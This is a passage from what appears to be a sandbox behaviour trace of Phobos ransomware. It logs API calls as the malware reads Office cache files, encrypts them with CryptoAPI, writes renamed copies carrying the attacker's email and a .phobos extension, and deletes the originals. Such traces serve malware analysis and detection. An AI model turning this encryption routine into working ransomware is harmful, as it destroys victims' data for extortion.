lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8c0 | out: lpNewFilePointer=0x0) returned 1 [0161.070] ReadFile (in: hFile=0x194, lpBuffer=0x30b0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2e0f8cc, lpOverlapped=0x0 | out: lpBuffer=0x30b0058*, lpNumberOfBytesRead=0x2e0f8cc*=0x40000, lpOverlapped=0x0) returned 1 [0161.209] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x1a6600, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8c0 | out: lpNewFilePointer=0x0) returned 1 [0161.209] ReadFile (in: hFile=0x194, lpBuffer=0x30f0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2e0f8cc, lpOverlapped=0x0 | out: lpBuffer=0x30f0058*, lpNumberOfBytesRead=0x2e0f8cc*=0x40000, lpOverlapped=0x0) returned 1 [0161.471] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8b0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f91c | out: phKey=0x2e0f91c*=0xa32da8) returned 1 [0161.471] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0161.471] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8d0*=0xc0060, dwBufLen=0xc0060 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8d0*=0xc0060) returned 1 [0161.477] CryptDestroyKey (hKey=0xa32da8) returned 1 [0161.477] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f8 | out: lpNewFilePointer=0x0) returned 1 [0161.477] WriteFile (in: hFile=0x194, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xc0112, lpNumberOfBytesWritten=0x2e0f908, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f908*=0xc0112, lpOverlapped=0x0) returned 1 [0161.651] SetEndOfFile (hFile=0x194) returned 1 [0161.651] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x1a6600, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8c8 | out: lpNewFilePointer=0x0) returned 1 [0161.651] WriteFile (in: hFile=0x194, lpBuffer=0x313014a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2e0f8d4, lpOverlapped=0x0 | out: lpBuffer=0x313014a*, lpNumberOfBytesWritten=0x2e0f8d4*=0x40000, lpOverlapped=0x0) returned 1 [0161.653] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0xa2200, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8c8 | out: lpNewFilePointer=0x0) returned 1 [0161.653] WriteFile (in: hFile=0x194, lpBuffer=0x313014a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2e0f8d4, lpOverlapped=0x0 | out: lpBuffer=0x313014a*, lpNumberOfBytesWritten=0x2e0f8d4*=0x40000, lpOverlapped=0x0) returned 1 [0161.661] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8c8 | out: lpNewFilePointer=0x0) returned 1 [0161.662] WriteFile (in: hFile=0x194, lpBuffer=0x313014a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2e0f8d4, lpOverlapped=0x0 | out: lpBuffer=0x313014a*, lpNumberOfBytesWritten=0x2e0f8d4*=0x40000, lpOverlapped=0x0) returned 1 [0161.663] CloseHandle (hObject=0x194) returned 1 [0161.663] SetEvent (hEvent=0xe8) returned 1 [0161.663] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0161.663] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PidGenX.dll" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\pidgenx.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0161.683] GetFileSizeEx (in: hFile=0x194, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=1463568) returned 1 [0161.683] CloseHandle (hObject=0x194) returned 1 [0161.683] GetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PidGenX.dll" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\pidgenx.dll")) returned 0x2020 [0161.683] GetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PidGenX.dll.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\pidgenx.dll.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0161.683] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PidGenX.dll" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\pidgenx.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0161.683] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0161.684] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0161.684] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PidGenX.dll.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\pidgenx.dll.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0161.684] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32da8) returned 1 [0161.684] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0161.684] ReadFile (in: hFile=0x194, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x110100, lpOverlapped=0x0) returned 1 [0162.198] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x110100, dwBufLen=0x110100 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x110100) returned 1 [0162.231] WriteFile (in: hFile=0x138, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x110100, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x110100, lpOverlapped=0x0) returned 1 [0162.252] ReadFile (in: hFile=0x194, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x55410, lpOverlapped=0x0) returned 1 [0162.335] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x55420, dwBufLen=0x55420 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x55420) returned 1 [0162.337] WriteFile (in: hFile=0x138, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x55420, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x55420, lpOverlapped=0x0) returned 1 [0162.342] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32d28) returned 1 [0162.342] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0162.342] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40, dwBufLen=0x40 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40) returned 1 [0162.342] CryptDestroyKey (hKey=0xa32d28) returned 1 [0162.342] WriteFile (in: hFile=0x138, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0xf2, lpOverlapped=0x0) returned 1 [0162.342] CryptDestroyKey (hKey=0xa32da8) returned 1 [0162.342] CloseHandle (hObject=0x194) returned 1 [0162.342] CloseHandle (hObject=0x138) returned 1 [0162.342] DeleteFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PidGenX.dll" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\pidgenx.dll")) returned 1 [0162.345] SetEvent (hEvent=0xe8) returned 1 [0162.346] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0162.346] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\pkeyconfig-office.xrm-ms"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0162.347] GetFileSizeEx (in: hFile=0x138, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=715834) returned 1 [0162.347] CloseHandle (hObject=0x138) returned 1 [0162.347] GetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\pkeyconfig-office.xrm-ms")) returned 0x2020 [0162.347] GetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\pkeyconfig-office.xrm-ms.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0162.347] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\pkeyconfig-office.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0162.347] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0162.347] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0162.347] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\pkeyconfig-office.xrm-ms.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0162.347] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32da8) returned 1 [0162.347] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0162.347] ReadFile (in: hFile=0x138, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0xaec3a, lpOverlapped=0x0) returned 1 [0162.449] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0xaec40, dwBufLen=0xaec40 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0xaec40) returned 1 [0162.456] WriteFile (in: hFile=0x194, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xaec40, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0xaec40, lpOverlapped=0x0) returned 1 [0162.470] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32d28) returned 1 [0162.470] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0162.470] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x60, dwBufLen=0x60 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x60) returned 1 [0162.470] CryptDestroyKey (hKey=0xa32d28) returned 1 [0162.470] WriteFile (in: hFile=0x194, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x112, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x112, lpOverlapped=0x0) returned 1 [0162.470] CryptDestroyKey (hKey=0xa32da8) returned 1 [0162.470] CloseHandle (hObject=0x138) returned 1 [0162.470] CloseHandle (hObject=0x194) returned 1 [0162.470] DeleteFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\pkeyconfig-office.xrm-ms")) returned 1 [0162.482] SetEvent (hEvent=0xe8) returned 1 [0162.482] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0162.482] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjPrrWW.cab" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\prjprrww.cab"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0162.483] GetFileSizeEx (in: hFile=0x14c, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=162970271) returned 1 [0162.483] CloseHandle (hObject=0x14c) returned 1 [0162.483] GetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjPrrWW.cab" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\prjprrww.cab")) returned 0x2020 [0162.483] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjPrrWW.cab" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\prjprrww.cab"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjPrrWW.cab.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\prjprrww.cab.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 1 [0162.483] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjPrrWW.cab.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\prjprrww.cab.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0162.483] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8c0 | out: lpNewFilePointer=0x0) returned 1 [0162.484] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8c0 | out: lpNewFilePointer=0x0) returned 1 [0162.484] ReadFile (in: hFile=0x14c, lpBuffer=0x3070058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2e0f8cc, lpOverlapped=0x0 | out: lpBuffer=0x3070058*, lpNumberOfBytesRead=0x2e0f8cc*=0x40000, lpOverlapped=0x0) returned 1 [0162.774] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x33ce8df, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8c0 | out: lpNewFilePointer=0x0) returned 1 [0162.774] ReadFile (in: hFile=0x14c, lpBuffer=0x30b0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2e0f8cc, lpOverlapped=0x0 | out: lpBuffer=0x30b0058*, lpNumberOfBytesRead=0x2e0f8cc*=0x40000, lpOverlapped=0x0) returned 1 [0162.956] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x9b2ba9f, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8c0 | out: lpNewFilePointer=0x0) returned 1 [0162.956] ReadFile (in: hFile=0x14c, lpBuffer=0x30f0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2e0f8cc, lpOverlapped=0x0 | out: lpBuffer=0x30f0058*, lpNumberOfBytesRead=0x2e0f8cc*=0x40000, lpOverlapped=0x0) returned 1 [0163.157] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8b0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f91c | out: phKey=0x2e0f91c*=0xa32da8) returned 1 [0163.157] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0163.157] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8d0*=0xc0060, dwBufLen=0xc0060 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8d0*=0xc0060) returned 1 [0163.163] CryptDestroyKey (hKey=0xa32da8) returned 1 [0163.163] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f8 | out: lpNewFilePointer=0x0) returned 1 [0163.164] WriteFile (in: hFile=0x14c, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xc0112, lpNumberOfBytesWritten=0x2e0f908, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f908*=0xc0112, lpOverlapped=0x0) returned 1 [0163.178] SetEndOfFile (hFile=0x14c) returned 1 [0163.178] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x9b2ba9f, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8c8 | out: lpNewFilePointer=0x0) returned 1 [0163.178] WriteFile (in: hFile=0x14c, lpBuffer=0x313014a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2e0f8d4, lpOverlapped=0x0 | out: lpBuffer=0x313014a*, lpNumberOfBytesWritten=0x2e0f8d4*=0x40000, lpOverlapped=0x0) returned 1 [0163.180] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x33ce8df, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8c8 | out: lpNewFilePointer=0x0) returned 1 [0163.180] WriteFile (in: hFile=0x14c, lpBuffer=0x313014a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2e0f8d4, lpOverlapped=0x0 | out: lpBuffer=0x313014a*, lpNumberOfBytesWritten=0x2e0f8d4*=0x40000, lpOverlapped=0x0) returned 1 [0163.183] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8c8 | out: lpNewFilePointer=0x0) returned 1 [0163.183] WriteFile (in: hFile=0x14c, lpBuffer=0x313014a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2e0f8d4, lpOverlapped=0x0 | out: lpBuffer=0x313014a*, lpNumberOfBytesWritten=0x2e0f8d4*=0x40000, lpOverlapped=0x0) returned 1 [0163.184] CloseHandle (hObject=0x14c) returned 1 [0163.184] SetEvent (hEvent=0xe8) returned 1 [0163.184] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0163.184] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\setup.exe" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\setup.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0163.184] GetFileSizeEx (in: hFile=0x14c, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=1377656) returned 1 [0163.184] CloseHandle (hObject=0x14c) returned 1 [0163.184] GetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\setup.exe" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\setup.exe")) returned 0x2020 [0163.184] GetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\setup.exe.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\setup.exe.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0163.184] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\setup.exe" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\setup.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0163.185] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0163.185] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0163.185] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\setup.exe.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\setup.exe.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0163.185] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32da8) returned 1 [0163.185] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0163.185] ReadFile (in: hFile=0x14c, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x110100, lpOverlapped=0x0) returned 1 [0163.354] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x110100, dwBufLen=0x110100 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x110100) returned 1 [0163.362] WriteFile (in: hFile=0x130, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x110100, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x110100, lpOverlapped=0x0) returned 1 [0163.523] ReadFile (in: hFile=0x14c, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x40478, lpOverlapped=0x0) returned 1 [0163.523] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40480, dwBufLen=0x40480 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40480) returned 1 [0163.525] WriteFile (in: hFile=0x130, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x40480, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x40480, lpOverlapped=0x0) returned 1 [0163.540] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32ce8) returned 1 [0163.540] CryptSetKeyParam (hKey=0xa32ce8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0163.540] CryptEncrypt (in: hKey=0xa32ce8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40, dwBufLen=0x40 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40) returned 1 [0163.540] CryptDestroyKey (hKey=0xa32ce8) returned 1 [0163.540] WriteFile (in: hFile=0x130, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0xf2, lpOverlapped=0x0) returned 1 [0163.541] CryptDestroyKey (hKey=0xa32da8) returned 1 [0163.541] CloseHandle (hObject=0x14c) returned 1 [0163.541] CloseHandle (hObject=0x130) returned 1 [0163.541] DeleteFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\setup.exe" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\setup.exe")) returned 1 [0163.544] SetEvent (hEvent=0xe8) returned 1 [0163.544] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0163.544] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\ose.exe" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\ose.exe"), 